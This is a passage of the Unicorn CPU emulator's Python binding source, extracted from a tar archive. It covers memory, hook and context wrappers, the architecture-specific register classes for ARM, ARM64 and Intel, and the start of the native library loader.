status = _uc.uc_mem_unmap(self._uch, address, size) if status != uc.UC_ERR_OK: raise UcError(status) # protect a range of memory def mem_protect(self, address, size, perms=uc.UC_PROT_ALL): status = _uc.uc_mem_protect(self._uch, address, size, perms) if status != uc.UC_ERR_OK: raise UcError(status) # return CPU mode at runtime def query(self, query_mode): result = ctypes.c_size_t(0) status = _uc.uc_query(self._uch, query_mode, ctypes.byref(result)) if status != uc.UC_ERR_OK: raise UcError(status) return result.value @_catch_hook_exception def _hook_tcg_op_cb(self, handle, address, arg1, arg2, user_data): (cb, data) = self._callbacks[user_data] cb(self, address, arg1, arg2, user_data) @_catch_hook_exception def _hook_edge_gen_cb(self, handle, cur, prev, user_data): (cb, data) = self._callbacks[user_data] cb(self, cur.contents, prev.contents, user_data) @_catch_hook_exception def _hookcode_cb(self, handle, address, size, user_data): # call user's callback with self object (cb, data) = self._callbacks[user_data] cb(self, address, size, data) @_catch_hook_exception def _hook_mem_invalid_cb(self, handle, access, address, size, value, user_data): # call user's callback with self object (cb, data) = self._callbacks[user_data] return cb(self, access, address, size, value, data) @_catch_hook_exception def _hook_mem_access_cb(self, handle, access, address, size, value, user_data): # call user's callback with self object (cb, data) = self._callbacks[user_data] cb(self, access, address, size, value, data) @_catch_hook_exception def _hook_intr_cb(self, handle, intno, user_data): # call user's callback with self object (cb, data) = self._callbacks[user_data] cb(self, intno, data) @_catch_hook_exception def _hook_insn_invalid_cb(self, handle, user_data): # call user's callback with self object (cb, data) = self._callbacks[user_data] return cb(self, data) @_catch_hook_exception def _hook_insn_in_cb(self, handle, port, size, user_data): # call user's callback with self object (cb, data) = self._callbacks[user_data] return cb(self, port, size, data) @_catch_hook_exception def _hook_insn_sys_cb(self, handle, reg, pcp_reg, user_data): cp_reg = ctypes.cast(pcp_reg, ctypes.POINTER(uc_arm64_cp_reg)).contents uc_arm64_cp_reg_tuple = namedtuple("uc_arm64_cp_reg_tuple", ["crn", "crm", "op0", "op1", "op2", "val"]) (cb, data) = self._callbacks[user_data] return cb(self, reg, uc_arm64_cp_reg_tuple(cp_reg.crn, cp_reg.crm, cp_reg.op0, cp_reg.op1, cp_reg.op2, cp_reg.val), data) @_catch_hook_exception def _hook_insn_out_cb(self, handle, port, size, value, user_data): # call user's callback with self object (cb, data) = self._callbacks[user_data] cb(self, port, size, value, data) @_catch_hook_exception def _hook_insn_syscall_cb(self, handle, user_data): # call user's callback with self object (cb, data) = self._callbacks[user_data] cb(self, data) def ctl(self, control, *args): status = _uc.uc_ctl(self._uch, control, *args) if status != uc.UC_ERR_OK: raise UcError(status) return status def __ctl(self, ctl, nr, rw): return ctl | (nr << 26) | (rw << 30) def __ctl_r(self, ctl, nr): return self.__ctl(ctl, nr, uc.UC_CTL_IO_READ) def __ctl_w(self, ctl, nr): return self.__ctl(ctl, nr, uc.UC_CTL_IO_WRITE) def __ctl_rw(self, ctl, nr): return self.__ctl(ctl, nr, uc.UC_CTL_IO_READ_WRITE) def __ctl_r_1_arg(self, ctl, ctp): arg = ctp() self.ctl(self.__ctl_r(ctl, 1), ctypes.byref(arg)) return arg.value def __ctl_w_1_arg(self, ctl, val, ctp): arg = ctp(val) self.ctl(self.__ctl_w(ctl, 1), arg) def __ctl_w_2_arg(self, ctl, val1, val2, ctp1, ctp2): arg1 = ctp1(val1) arg2 = ctp2(val2) self.ctl(self.__ctl_w(ctl, 2), arg1, arg2) def __ctl_rw_1_1_arg(self, ctl, val, ctp1, ctp2): arg1 = ctp1(val) arg2 = ctp2() self.ctl(self.__ctl_rw(ctl, 2), arg1, ctypes.byref(arg2)) return arg2 def ctl_get_mode(self): return self.__ctl_r_1_arg(uc.UC_CTL_UC_MODE, ctypes.c_int) def ctl_get_page_size(self): return self.__ctl_r_1_arg(uc.UC_CTL_UC_PAGE_SIZE, ctypes.c_uint32) def ctl_set_page_size(self, val): self.__ctl_w_1_arg(uc.UC_CTL_UC_PAGE_SIZE, val, ctypes.c_uint32) def ctl_get_arch(self): return self.__ctl_r_1_arg(uc.UC_CTL_UC_ARCH, ctypes.c_int) def ctl_get_timeout(self): return self.__ctl_r_1_arg(uc.UC_CTL_UC_TIMEOUT, ctypes.c_uint64) def ctl_exits_enabled(self, val): self.__ctl_w_1_arg(uc.UC_CTL_UC_USE_EXITS, val, ctypes.c_int) def ctl_get_exits_cnt(self): return self.__ctl_r_1_arg(uc.UC_CTL_UC_EXITS_CNT, ctypes.c_size_t) def ctl_get_exits(self): l = self.ctl_get_exits_cnt() arr = (ctypes.c_uint64 * l)() self.ctl(self.__ctl_r(uc.UC_CTL_UC_EXITS, 2), ctypes.cast(arr, ctypes.c_void_p), ctypes.c_size_t(l)) return [i for i in arr] def ctl_set_exits(self, exits): arr = (ctypes.c_uint64 * len(exits))() for idx, exit in enumerate(exits): arr[idx] = exit self.ctl(self.__ctl_w(uc.UC_CTL_UC_EXITS, 2), ctypes.cast(arr, ctypes.c_void_p), ctypes.c_size_t(len(exits))) def ctl_get_cpu_model(self): return self.__ctl_r_1_arg(uc.UC_CTL_CPU_MODEL, ctypes.c_int) def ctl_set_cpu_model(self, val): self.__ctl_w_1_arg(uc.UC_CTL_CPU_MODEL, val, ctypes.c_int) def ctl_remove_cache(self, addr, end): self.__ctl_w_2_arg(uc.UC_CTL_TB_REMOVE_CACHE, addr, end, ctypes.c_uint64, ctypes.c_uint64) def ctl_request_cache(self, addr): return self.__ctl_rw_1_1_arg(uc.UC_CTL_TB_REQUEST_CACHE, addr, ctypes.c_uint64, uc_tb) # add a hook def hook_add(self, htype, callback, user_data=None, begin=1, end=0, arg1=0, arg2=0): _h2 = uc_hook_h() # save callback & user_data self._callback_count += 1 self._callbacks[self._callback_count] = (callback, user_data) cb = None if htype == uc.UC_HOOK_INSN: insn = ctypes.c_int(arg1) if arg1 == x86_const.UC_X86_INS_IN: # IN instruction cb = ctypes.cast(UC_HOOK_INSN_IN_CB(self._hook_insn_in_cb), UC_HOOK_INSN_IN_CB) if arg1 == x86_const.UC_X86_INS_OUT: # OUT instruction cb = ctypes.cast(UC_HOOK_INSN_OUT_CB(self._hook_insn_out_cb), UC_HOOK_INSN_OUT_CB) if arg1 in (x86_const.UC_X86_INS_SYSCALL, x86_const.UC_X86_INS_SYSENTER): # SYSCALL/SYSENTER instruction cb = ctypes.cast(UC_HOOK_INSN_SYSCALL_CB(self._hook_insn_syscall_cb), UC_HOOK_INSN_SYSCALL_CB) if arg1 in (arm64_const.UC_ARM64_INS_MRS, arm64_const.UC_ARM64_INS_MSR, arm64_const.UC_ARM64_INS_SYS, arm64_const.UC_ARM64_INS_SYSL): cb = ctypes.cast(UC_HOOK_INSN_SYS_CB(self._hook_insn_sys_cb), UC_HOOK_INSN_SYS_CB) status = _uc.uc_hook_add( self._uch, ctypes.byref(_h2), htype, cb, ctypes.cast(self._callback_count, ctypes.c_void_p), ctypes.c_uint64(begin), ctypes.c_uint64(end), insn ) elif htype == uc.UC_HOOK_TCG_OPCODE: opcode = ctypes.c_int(arg1) flags = ctypes.c_int(arg2) status = _uc.uc_hook_add( self._uch, ctypes.byref(_h2), htype, ctypes.cast(UC_HOOK_TCG_OPCODE_CB(self._hook_tcg_op_cb), UC_HOOK_TCG_OPCODE_CB), ctypes.cast(self._callback_count, ctypes.c_void_p), ctypes.c_uint64(begin), ctypes.c_uint64(end), opcode, flags ) elif htype == uc.UC_HOOK_INTR: cb = ctypes.cast(UC_HOOK_INTR_CB(self._hook_intr_cb), UC_HOOK_INTR_CB) status = _uc.uc_hook_add( self._uch, ctypes.byref(_h2), htype, cb, ctypes.cast(self._callback_count, ctypes.c_void_p), ctypes.c_uint64(begin), ctypes.c_uint64(end) ) elif htype == uc.UC_HOOK_INSN_INVALID: cb = ctypes.cast(UC_HOOK_INSN_INVALID_CB(self._hook_insn_invalid_cb), UC_HOOK_INSN_INVALID_CB) status = _uc.uc_hook_add( self._uch, ctypes.byref(_h2), htype, cb, ctypes.cast(self._callback_count, ctypes.c_void_p), ctypes.c_uint64(begin), ctypes.c_uint64(end) ) elif htype == uc.UC_HOOK_EDGE_GENERATED: cb = ctypes.cast(UC_HOOK_EDGE_GEN_CB(self._hook_edge_gen_cb), UC_HOOK_EDGE_GEN_CB) status = _uc.uc_hook_add( self._uch, ctypes.byref(_h2), htype, cb, ctypes.cast(self._callback_count, ctypes.c_void_p), ctypes.c_uint64(begin), ctypes.c_uint64(end) ) else: if htype in (uc.UC_HOOK_BLOCK, uc.UC_HOOK_CODE): # set callback with wrapper, so it can be called # with this object as param cb = ctypes.cast(UC_HOOK_CODE_CB(self._hookcode_cb), UC_HOOK_CODE_CB) status = _uc.uc_hook_add( self._uch, ctypes.byref(_h2), htype, cb, ctypes.cast(self._callback_count, ctypes.c_void_p), ctypes.c_uint64(begin), ctypes.c_uint64(end) ) elif htype & (uc.UC_HOOK_MEM_READ_UNMAPPED | uc.UC_HOOK_MEM_WRITE_UNMAPPED | uc.UC_HOOK_MEM_FETCH_UNMAPPED | uc.UC_HOOK_MEM_READ_PROT | uc.UC_HOOK_MEM_WRITE_PROT | uc.UC_HOOK_MEM_FETCH_PROT): cb = ctypes.cast(UC_HOOK_MEM_INVALID_CB(self._hook_mem_invalid_cb), UC_HOOK_MEM_INVALID_CB) status = _uc.uc_hook_add( self._uch, ctypes.byref(_h2), htype, cb, ctypes.cast(self._callback_count, ctypes.c_void_p), ctypes.c_uint64(begin), ctypes.c_uint64(end) ) else: cb = ctypes.cast(UC_HOOK_MEM_ACCESS_CB(self._hook_mem_access_cb), UC_HOOK_MEM_ACCESS_CB) status = _uc.uc_hook_add( self._uch, ctypes.byref(_h2), htype, cb, ctypes.cast(self._callback_count, ctypes.c_void_p), ctypes.c_uint64(begin), ctypes.c_uint64(end) ) # save the ctype function so gc will leave it alone. self._ctype_cbs.append(cb) if status != uc.UC_ERR_OK: raise UcError(status) return _h2.value # delete a hook def hook_del(self, h): _h = uc_hook_h(h) status = _uc.uc_hook_del(self._uch, _h) if status != uc.UC_ERR_OK: raise UcError(status) h = 0 def context_save(self): context = UcContext(self._uch, self._arch, self._mode) status = _uc.uc_context_save(self._uch, context.context) if status != uc.UC_ERR_OK: raise UcError(status) return context def context_update(self, context): status = _uc.uc_context_save(self._uch, context.context) if status != uc.UC_ERR_OK: raise UcError(status) def context_restore(self, context): status = _uc.uc_context_restore(self._uch, context.context) if status != uc.UC_ERR_OK: raise UcError(status) # this returns a generator of regions in the form (begin, end, perms) def mem_regions(self): regions = ctypes.POINTER(_uc_mem_region)() count = ctypes.c_uint32() status = _uc.uc_mem_regions(self._uch, ctypes.byref(regions), ctypes.byref(count)) if status != uc.UC_ERR_OK: raise UcError(status) try: for i in range(count.value): yield (regions[i].begin, regions[i].end, regions[i].perms) finally: _uc.uc_free(regions) class UcContext: def __init__(self, h, arch, mode): self._context = uc_context() self._size = _uc.uc_context_size(h) self._to_free = True status = _uc.uc_context_alloc(h, ctypes.byref(self._context)) if status != uc.UC_ERR_OK: raise UcError(status) self._arch = arch self._mode = mode @property def context(self): return self._context @property def size(self): return self._size @property def arch(self): return self._arch @property def mode(self): return self._mode # return the value of a register def reg_read(self, reg_id, opt=None): return reg_read(functools.partial(_uc.uc_context_reg_read, self._context), self.arch, reg_id, opt) # write to a register def reg_write(self, reg_id, value): return reg_write(functools.partial(_uc.uc_context_reg_write, self._context), self.arch, reg_id, value) # Make UcContext picklable def __getstate__(self): return (bytes(self), self.size, self.arch, self.mode) def __setstate__(self, state): self._size = state[1] self._context = ctypes.cast(ctypes.create_string_buffer(state[0], self._size), uc_context) # __init__ won'e be invoked, so we are safe to set it here. self._to_free = False self._arch = state[2] self._mode = state[3] def __bytes__(self): return ctypes.string_at(self.context, self.size) def __del__(self): # We need this property since we shouldn't free it if the object is constructed from pickled bytes. if self._to_free: _uc.uc_context_free(self._context) # print out debugging info def debug(): archs = { "arm": uc.UC_ARCH_ARM, "arm64": uc.UC_ARCH_ARM64, "mips": uc.UC_ARCH_MIPS, "sparc": uc.UC_ARCH_SPARC, "m68k": uc.UC_ARCH_M68K, "x86": uc.UC_ARCH_X86, "riscv": uc.UC_ARCH_RISCV, "ppc": uc.UC_ARCH_PPC, } all_archs = "" keys = archs.keys() for k in sorted(keys): if uc_arch_supported(archs[k]): all_archs += "-%s" % k major, minor, _combined = uc_version() return "python-%s-c%u.%u-b%u.%u" % ( all_archs, major, minor, uc.UC_API_MAJOR, uc.UC_API_MINOR )������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/unicorn/unicorn_py3/��������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0022247�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/unicorn/unicorn_py3/__init__.py���������������������������������������0000664�0000000�0000000�00000000027�14675241067�0024357�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from .unicorn import * ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/unicorn/unicorn_py3/arch/���������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0023164�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/unicorn/unicorn_py3/arch/__init__.py����������������������������������0000664�0000000�0000000�00000000000�14675241067�0025263�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/unicorn/unicorn_py3/arch/arm.py���������������������������������������0000664�0000000�0000000�00000004313�14675241067�0024316�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������"""AArch32 classes and structures. """ # @author elicn from typing import Any, Tuple import ctypes # traditional unicorn imports from unicorn import arm_const as const # newly introduced unicorn imports from ..unicorn import Uc from .types import UcTupledReg, UcReg128 ARMCPReg = Tuple[int, int, int, int, int, int, int, int] class UcRegCP(UcTupledReg[ARMCPReg]): """ARM coprocessors registers for instructions MRC, MCR, MRRC, MCRR """ _fields_ = ( ('cp', ctypes.c_uint32), ('is64', ctypes.c_uint32), ('sec', ctypes.c_uint32), ('crn', ctypes.c_uint32), ('crm', ctypes.c_uint32), ('opc1', ctypes.c_uint32), ('opc2', ctypes.c_uint32), ('val', ctypes.c_uint64) ) @property def value(self) -> int: return self.val class UcAArch32(Uc): """Unicorn subclass for ARM architecture. """ REG_RANGE_Q = range(const.UC_ARM_REG_Q0, const.UC_ARM_REG_Q15 + 1) @staticmethod def __select_reg_class(reg_id: int): """Select class for special architectural registers. """ reg_class = ( (UcAArch32.REG_RANGE_Q, UcReg128), ) return next((cls for rng, cls in reg_class if reg_id in rng), None) def reg_read(self, reg_id: int, aux: Any = None): # select register class for special cases reg_cls = UcAArch32.__select_reg_class(reg_id) if reg_cls is None: if reg_id == const.UC_ARM_REG_CP_REG: return self._reg_read(reg_id, UcRegCP, *aux) else: # fallback to default reading method return super().reg_read(reg_id, aux) return self._reg_read(reg_id, reg_cls) def reg_write(self, reg_id: int, value) -> None: # select register class for special cases reg_cls = UcAArch32.__select_reg_class(reg_id) if reg_cls is None: if reg_id == const.UC_ARM_REG_CP_REG: self._reg_write(reg_id, UcRegCP, value) else: # fallback to default writing method super().reg_write(reg_id, value) else: self._reg_write(reg_id, reg_cls, value) __all__ = ['UcRegCP', 'UcAArch32'] ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/unicorn/unicorn_py3/arch/arm64.py�������������������������������������0000664�0000000�0000000�00000007607�14675241067�0024501�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������"""AArch64 classes and structures. """ # @author elicn from typing import Any, Callable, NamedTuple, Tuple import ctypes # traditional unicorn imports from unicorn import arm64_const as const from unicorn.unicorn_const import UC_ERR_ARG, UC_HOOK_INSN # newly introduced unicorn imports from ..unicorn import Uc, UcError, uccallback from .types import uc_engine, UcTupledReg, UcReg128 ARM64CPReg = Tuple[int, int, int, int, int, int] HOOK_INSN_SYS_CFUNC = ctypes.CFUNCTYPE(ctypes.c_uint32, uc_engine, ctypes.c_uint32, ctypes.c_void_p, ctypes.c_void_p) class UcRegCP64(UcTupledReg[ARM64CPReg]): """ARM64 coprocessors registers for instructions MRS, MSR """ _fields_ = ( ('crn', ctypes.c_uint32), ('crm', ctypes.c_uint32), ('op0', ctypes.c_uint32), ('op1', ctypes.c_uint32), ('op2', ctypes.c_uint32), ('val', ctypes.c_uint64) ) @property def value(self) -> int: return self.val class UcAArch64(Uc): """Unicorn subclass for ARM64 architecture. """ REG_RANGE_Q = range(const.UC_ARM64_REG_Q0, const.UC_ARM64_REG_Q31 + 1) REG_RANGE_V = range(const.UC_ARM64_REG_V0, const.UC_ARM64_REG_V31 + 1) def hook_add(self, htype: int, callback: Callable, user_data: Any = None, begin: int = 1, end: int = 0, aux1: int = 0, aux2: int = 0) -> int: if htype != UC_HOOK_INSN: return super().hook_add(htype, callback, user_data, begin, end, aux1, aux2) insn = ctypes.c_int(aux1) def __hook_insn_sys(): @uccallback(self, HOOK_INSN_SYS_CFUNC) def __hook_insn_sys_cb(uc: Uc, reg: int, pcp_reg: Any, key: int) -> int: cp_reg = ctypes.cast(pcp_reg, ctypes.POINTER(UcRegCP64)).contents class CpReg(NamedTuple): crn: int crm: int op0: int op1: int op2: int val: int cp_reg = CpReg(cp_reg.crn, cp_reg.crm, cp_reg.op0, cp_reg.op1, cp_reg.op2, cp_reg.val) return callback(uc, reg, cp_reg, user_data) return __hook_insn_sys_cb handlers = { const.UC_ARM64_INS_MRS : __hook_insn_sys, const.UC_ARM64_INS_MSR : __hook_insn_sys, const.UC_ARM64_INS_SYS : __hook_insn_sys, const.UC_ARM64_INS_SYSL : __hook_insn_sys } handler = handlers.get(insn.value) if handler is None: raise UcError(UC_ERR_ARG) fptr = handler() return getattr(self, '_Uc__do_hook_add')(htype, fptr, begin, end, insn) @staticmethod def __select_reg_class(reg_id: int): """Select class for special architectural registers. """ reg_class = ( (UcAArch64.REG_RANGE_Q, UcReg128), (UcAArch64.REG_RANGE_V, UcReg128) ) return next((cls for rng, cls in reg_class if reg_id in rng), None) def reg_read(self, reg_id: int, aux: Any = None): # select register class for special cases reg_cls = UcAArch64.__select_reg_class(reg_id) if reg_cls is None: if reg_id == const.UC_ARM64_REG_CP_REG: return self._reg_read(reg_id, UcRegCP64, *aux) else: # fallback to default reading method return super().reg_read(reg_id, aux) return self._reg_read(reg_id, reg_cls) def reg_write(self, reg_id: int, value) -> None: # select register class for special cases reg_cls = UcAArch64.__select_reg_class(reg_id) if reg_cls is None: if reg_id == const.UC_ARM64_REG_CP_REG: self._reg_write(reg_id, UcRegCP64, value) else: # fallback to default writing method super().reg_write(reg_id, value) else: self._reg_write(reg_id, reg_cls, value) __all__ = ['UcRegCP64', 'UcAArch64'] �������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/unicorn/unicorn_py3/arch/intel.py�������������������������������������0000664�0000000�0000000�00000014233�14675241067�0024654�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������"""Intel architecture classes and structures. """ # @author elicn from typing import Any, Callable, Sequence, Tuple import ctypes # traditional unicorn imports from unicorn import x86_const as const from unicorn.unicorn_const import UC_ERR_ARG, UC_HOOK_INSN # newly introduced unicorn imports from ..unicorn import Uc, UcError, uccallback from .types import uc_engine, UcTupledReg, UcReg128, UcReg256, UcReg512 X86MMRReg = Tuple[int, int, int, int] X86MSRReg = Tuple[int, int] X86FPReg = Tuple[int, int] HOOK_INSN_IN_CFUNC = ctypes.CFUNCTYPE(ctypes.c_uint32, uc_engine, ctypes.c_uint32, ctypes.c_int, ctypes.c_void_p) HOOK_INSN_OUT_CFUNC = ctypes.CFUNCTYPE(None, uc_engine, ctypes.c_uint32, ctypes.c_int, ctypes.c_uint32, ctypes.c_void_p) HOOK_INSN_SYSCALL_CFUNC = ctypes.CFUNCTYPE(None, uc_engine, ctypes.c_void_p) HOOK_INSN_CPUID_CFUNC = ctypes.CFUNCTYPE(ctypes.c_uint32, uc_engine, ctypes.c_void_p) class UcRegMMR(UcTupledReg[X86MMRReg]): """Memory-Management Register for instructions IDTR, GDTR, LDTR, TR. """ _fields_ = ( ('selector', ctypes.c_uint16), # not used by GDTR and IDTR ('base', ctypes.c_uint64), # handle 32 or 64 bit CPUs ('limit', ctypes.c_uint32), ('flags', ctypes.c_uint32) # not used by GDTR and IDTR ) class UcRegMSR(UcTupledReg[X86MSRReg]): """Intel Model Specific Register """ _fields_ = ( ('rid', ctypes.c_uint32), ('val', ctypes.c_uint64) ) @property def value(self) -> int: return self.val class UcRegFPR(UcTupledReg[X86FPReg]): """Intel Floating Point Register """ _fields_ = ( ('mantissa', ctypes.c_uint64), ('exponent', ctypes.c_uint16) ) class UcIntel(Uc): """Unicorn subclass for Intel architecture. """ REG_RANGE_MMR = ( const.UC_X86_REG_IDTR, const.UC_X86_REG_GDTR, const.UC_X86_REG_LDTR, const.UC_X86_REG_TR ) REG_RANGE_FP = range(const.UC_X86_REG_FP0, const.UC_X86_REG_FP7 + 1) REG_RANGE_XMM = range(const.UC_X86_REG_XMM0, const.UC_X86_REG_XMM31 + 1) REG_RANGE_YMM = range(const.UC_X86_REG_YMM0, const.UC_X86_REG_YMM31 + 1) REG_RANGE_ZMM = range(const.UC_X86_REG_ZMM0, const.UC_X86_REG_ZMM31 + 1) def hook_add(self, htype: int, callback: Callable, user_data: Any = None, begin: int = 1, end: int = 0, aux1: int = 0, aux2: int = 0) -> int: if htype != UC_HOOK_INSN: return super().hook_add(htype, callback, user_data, begin, end, aux1, aux2) insn = ctypes.c_int(aux1) def __hook_insn_in(): @uccallback(self, HOOK_INSN_IN_CFUNC) def __hook_insn_in_cb(uc: Uc, port: int, size: int, key: int) -> int: return callback(uc, port, size, user_data) return __hook_insn_in_cb def __hook_insn_out(): @uccallback(self, HOOK_INSN_OUT_CFUNC) def __hook_insn_out_cb(uc: Uc, port: int, size: int, value: int, key: int): callback(uc, port, size, value, user_data) return __hook_insn_out_cb def __hook_insn_syscall(): @uccallback(self, HOOK_INSN_SYSCALL_CFUNC) def __hook_insn_syscall_cb(uc: Uc, key: int): callback(uc, user_data) return __hook_insn_syscall_cb def __hook_insn_cpuid(): @uccallback(self, HOOK_INSN_CPUID_CFUNC) def __hook_insn_cpuid_cb(uc: Uc, key: int) -> int: return callback(uc, user_data) return __hook_insn_cpuid_cb handlers = { const.UC_X86_INS_IN : __hook_insn_in, const.UC_X86_INS_OUT : __hook_insn_out, const.UC_X86_INS_SYSCALL : __hook_insn_syscall, const.UC_X86_INS_SYSENTER : __hook_insn_syscall, const.UC_X86_INS_CPUID : __hook_insn_cpuid } handler = handlers.get(insn.value) if handler is None: raise UcError(UC_ERR_ARG) fptr = handler() return getattr(self, '_Uc__do_hook_add')(htype, fptr, begin, end, insn) @staticmethod def __select_reg_class(reg_id: int): """Select class for special architectural registers. """ reg_class = ( (UcIntel.REG_RANGE_MMR, UcRegMMR), (UcIntel.REG_RANGE_FP, UcRegFPR), (UcIntel.REG_RANGE_XMM, UcReg128), (UcIntel.REG_RANGE_YMM, UcReg256), (UcIntel.REG_RANGE_ZMM, UcReg512) ) return next((cls for rng, cls in reg_class if reg_id in rng), None) def reg_read(self, reg_id: int, aux: Any = None): # select register class for special cases reg_cls = UcIntel.__select_reg_class(reg_id) if reg_cls is None: # backward compatibility: msr read through reg_read if reg_id == const.UC_X86_REG_MSR: if type(aux) is not int: raise UcError(UC_ERR_ARG) value = self.msr_read(aux) else: value = super().reg_read(reg_id, aux) else: value = self._reg_read(reg_id, reg_cls) return value def reg_write(self, reg_id: int, value) -> None: # select register class for special cases reg_cls = UcIntel.__select_reg_class(reg_id) if reg_cls is None: # backward compatibility: msr write through reg_write if reg_id == const.UC_X86_REG_MSR: if type(value) is not tuple or len(value) != 2: raise UcError(UC_ERR_ARG) self.msr_write(*value) return super().reg_write(reg_id, value) else: self._reg_write(reg_id, reg_cls, value) def msr_read(self, msr_id: int) -> int: return self._reg_read(const.UC_X86_REG_MSR, UcRegMSR, msr_id) def msr_write(self, msr_id: int, value: int) -> None: self._reg_write(const.UC_X86_REG_MSR, UcRegMSR, (msr_id, value)) def reg_read_batch(self, reg_ids: Sequence[int]) -> Tuple: reg_types = [UcIntel.__select_reg_class(rid) or self._DEFAULT_REGTYPE for rid in reg_ids] return self._reg_read_batch(reg_ids, reg_types) __all__ = ['UcRegMMR', 'UcRegMSR', 'UcRegFPR', 'UcIntel'] ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/unicorn/unicorn_py3/arch/types.py�������������������������������������0000664�0000000�0000000�00000004470�14675241067�0024707�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������"""Common types and structures. """ # @author elicn from abc import abstractmethod from typing import Generic, Tuple, TypeVar import ctypes uc_err = ctypes.c_int uc_engine = ctypes.c_void_p uc_context = ctypes.c_void_p uc_hook_h = ctypes.c_size_t VT = TypeVar('VT', bound=Tuple[int, ...]) class UcReg(ctypes.Structure): """A base class for composite registers. This class is meant to be inherited, not instantiated directly. """ @property @abstractmethod def value(self): """Get register value. """ pass @classmethod @abstractmethod def from_value(cls, value): """Create a register instance from a given value. """ pass class UcTupledReg(UcReg, Generic[VT]): """A base class for registers whose values are represented as a set of fields. This class is meant to be inherited, not instantiated directly. """ @property def value(self) -> VT: return tuple(getattr(self, fname) for fname, *_ in self.__class__._fields_) # type: ignore @classmethod def from_value(cls, value: VT): assert type(value) is tuple and len(value) == len(cls._fields_) return cls(*value) class UcLargeReg(UcReg): """A base class for large registers that are internally represented as an array of multiple qwords. This class is meant to be inherited, not instantiated directly. """ qwords: ctypes.Array @property def value(self) -> int: return sum(qword << (64 * i) for i, qword in enumerate(self.qwords)) @classmethod def from_value(cls, value: int): assert type(value) is int mask = (1 << 64) - 1 size = cls._fields_[0][1]._length_ return cls(tuple((value >> (64 * i)) & mask for i in range(size))) class UcReg128(UcLargeReg): """Large register holding a 128-bit value. """ _fields_ = [('qwords', ctypes.c_uint64 * 2)] class UcReg256(UcLargeReg): """Large register holding a 256-bit value. """ _fields_ = [('qwords', ctypes.c_uint64 * 4)] class UcReg512(UcLargeReg): """Large register holding a 512-bit value. """ _fields_ = [('qwords', ctypes.c_uint64 * 8)] __all__ = ['uc_err', 'uc_engine', 'uc_context', 'uc_hook_h', 'UcReg', 'UcTupledReg', 'UcLargeReg', 'UcReg128', 'UcReg256', 'UcReg512'] ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/unicorn/unicorn_py3/unicorn.py����������������������������������������0000664�0000000�0000000�00000123165�14675241067�0024306�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������"""New and improved Unicorn Python bindings by elicn based on Nguyen Anh Quynnh's work """ from __future__ import annotations from typing import TYPE_CHECKING, Any, Callable, Iterable, Iterator, Mapping, MutableMapping, Optional, Sequence, Tuple, Type, TypeVar import ctypes import functools import weakref from unicorn import unicorn_const as uc from .arch.types import uc_err, uc_engine, uc_context, uc_hook_h, UcReg # __version__ = f'{uc.UC_VERSION_MAJOR}.{uc.UC_VERSION_MINOR}.{uc.UC_VERSION_PATCH}' class _uc_mem_region(ctypes.Structure): _fields_ = ( ('begin', ctypes.c_uint64), ('end', ctypes.c_uint64), ('perms', ctypes.c_uint32), ) @property def value(self) -> Tuple[int, int, int]: return tuple(getattr(self, fname) for fname, *_ in self._fields_) class uc_tb(ctypes.Structure): """"TranslationBlock """ _fields_ = ( ('pc', ctypes.c_uint64), ('icount', ctypes.c_uint16), ('size', ctypes.c_uint16) ) def __load_uc_lib() -> ctypes.CDLL: from pathlib import Path, PurePath import inspect import os import sys loaded_dlls = set() def __load_win_support(path: Path) -> None: # Windows DLL in dependency order all_dlls = ( 'libwinpthread-1.dll', 'libgcc_s_seh-1.dll', 'libgcc_s_dw2-1.dll' ) for dllname in all_dlls: if dllname not in loaded_dlls: lib_file = path / dllname if str(path.parent) == '.' or lib_file.exists(): try: ctypes.cdll.LoadLibrary(str(lib_file)) except OSError: continue else: loaded_dlls.add(dllname) platform = sys.platform # Initial attempt: load all dlls globally if platform in ('win32', 'cygwin'): __load_win_support(Path()) def _load_lib(path: Path, lib_name: str): if platform in ('win32', 'cygwin'): __load_win_support(path) lib_file = path / lib_name try: return ctypes.cdll.LoadLibrary(str(lib_file)) except OSError: return None # Loading attempts, in order # - user-provided environment variable # - pkg_resources can get us the path to the local libraries # - we can get the path to the local libraries by parsing our filename # - global load # - python's lib directory canonicals = [] try: from importlib import resources canonicals.append( resources.files("unicorn") / 'lib' ) except ImportError: try: import pkg_resources canonicals.append( pkg_resources.resource_filename("unicorn", 'lib') ) except ImportError: # maybe importlib_resources, but ignore for now pass lib_locations = [ 